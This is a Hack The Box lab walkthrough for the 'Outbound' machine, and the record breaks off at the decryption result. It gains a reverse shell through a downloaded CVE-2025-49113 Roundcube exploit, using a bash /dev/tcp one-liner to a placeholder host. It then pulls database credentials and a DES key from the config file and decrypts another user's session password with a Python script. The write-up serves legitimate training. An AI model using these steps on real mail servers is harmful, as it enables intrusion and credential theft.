HTB Outbound - Complete Walkthrough
Machine Information
| Attribute | Value |
|---|---|
| Target IP | 10.x.x.x |
| Hostname | mail.outbound.htb |
| OS | Ubuntu Linux |
| Difficulty | Easy |
| Initial Credentials | tyler:LhKL1o9Nm3X2 |
Reconnaissance
Port Scanning
nmap -sV -sC -v 10.x.x.x
Results:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-12 14:46 CDT
Nmap scan report for mail.outbound.htb (10.x.x.x)
Host is up (0.012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Analysis
- SSH (Port 22): OpenSSH 9.6p1 Ubuntu
- HTTP (Port 80): nginx 1.24.0 serving Roundcube webmail
The web application is identified as Roundcube Webmail accessible athttp://mail.outbound.htb/.
Initial Access
Roundcube Authentication
Using the provided credentials:
- Username: tyler
- Password: LhKL1o9Nm3X2
Successfully authenticated to the Roundcube webmail interface.
Vulnerability Identification
After logging in and examining the application, identified that this Roundcube version is vulnerable to CVE-2025-49113 - a remote code execution vulnerability.
CVE-2025-49113 Exploitation
1. Download the exploit:
wget https://raw.githubusercontent.com/hakaioffsec/CVE-2025-49113-exploit/refs/heads/main/CVE-2025-49113.php
2. Execute the exploit for reverse shell:
php exploit.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "bash -c 'bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1'"
3. Caught reverse shell as www-data
4. Switch to tyler user:
su tyler
# Password: LhKL1o9Nm3X2
Information Gathering
Roundcube Configuration Analysis
Located and examined the Roundcube configuration file:
File: /var/www/html/roundcube/config/config.inc.php
Key findings:
// Database connection string
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
// Encryption key for session data
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
Database Enumeration
Connect to MySQL database:
mysql -u roundcube -pRCDBPass2025 -h localhost roundcube
Examine session table:
USE roundcube;
SELECT * FROM session;
Session data discovered:
The session table contains base64-encoded serialized PHP data with encrypted user passwords.
Key sessions identified:
- jacob: Active session with encrypted password
- tyler: Current user session
Lateral Movement
Session Decryption
Analysis of jacob's session data:
After base64 decoding the session data, found:
username|s:5:"jacob";
password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";
Password Decryption Script:
#!/usr/bin/env python3
from Crypto.Cipher import DES3
from base64 import b64decode
def decrypt_password(encrypted_password, key="rcmail-!24ByteDESkey*Str"):
try:
des_key = key.encode('utf-8')
data = b64decode(encrypted_password)
iv = data[:8]
ciphertext = data[8:]
cipher = DES3.new(des_key, DES3.MODE_CBC, iv=iv)
decrypted = cipher.decrypt(ciphertext)
return decrypted.rstrip(b"\0").decode('utf-8', errors='ignore')
except Exception as e:
return f"Error: {str(e)}"
# Jacob's encrypted password
encrypted = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
print(f"Decrypted password: {decrypt_password(encrypted)}")
Result: